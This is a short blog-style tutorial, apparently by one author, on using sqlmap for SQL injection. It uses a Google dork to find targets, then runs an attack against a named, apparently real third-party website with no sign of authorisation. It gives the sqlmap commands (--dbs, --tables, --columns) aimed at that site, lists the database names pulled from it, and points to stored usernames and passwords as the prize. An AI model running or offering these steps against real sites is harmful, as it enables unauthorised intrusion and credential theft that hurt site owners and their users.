🎩 Exploit Website Databases Using SQLmap 🎩
✨SQLmap is one of the most famous tools for SQL injection. It is pre-installed in Kali Linux so no need to download it from anywhere.
What is a SQL injection attack❓
✨SQLi is a common attack where the attacker injects and executes malicious SQL requests in order to get hold of the web databases. These attacks are common in vulnerable websites that use SQL RDBMS to store databases
So today we'll perform an SQLi attack on a vulnerable website
✅ Requirements
⭕️Kali
⭕️Knowledge on Google Dorking
✅ Steps
⭕️ Google Dork vulnerable websites
First of all we have to get a vulnerable website to perform the attack. So we'll use Google Dorking. In simple words, it means that using Google search engine, we can use some special codes in order to get some security holes in websites. Here I'm gonna use this Dork to get SQLi vulnerable websites
inurl:index.php?id=
This will have many results. I've chosen the following website
http://www.asfaa.org/members.php?id=1
⭕️ Get the vulnerability of the website
To get the vulnerability, I'll use the following trick
Add 1 with Asterix * and reload the website
http://www.asfaa.org/members.php?id=1*
When the website shows error, it means that it's vulnerable
⭕️ Fire up Sqlmap 🔥
Open terminal. Then type there
sqlmap -u yoururl
⚠️Make sure to replace the Asterix with the original value and give the full URL
In my case, I typed
sqlmap -u http://www.asfaa.org/members.php?id=1
It'll start injecting malicious SQL requests. Once done, you'll notice the changes
⭕️ Exploit databases
Now we need to type the next command
sqlmap -u yoururl --dbs
When I did it in my case, I received the following databases
information_schema
db83231_acolop
db83231_asfaa
⭕️ Extract the tables and columns
Now, you can extract the tables of any of the databases using the command
sqlmap -u yoururl -D databasename --tables
For columns,
sqlmap -u yoururl -D databasename -T tablename --columns
I did the following
sqlmap -u http://www.asfaa.org/members.php?id=1 -D db83231_asfaa --tables
sqlmap -u http://www.asfaa.org/members.php?id=1 -D db83231_asfaa -T members --columns
And I got lots of results ❗️
ℹ️ One main advantage of SQLi is that some websites store usernames and passwords in SQL databases that can be exploited.
Hafiz Muhammad Attaullah
Top comments (0)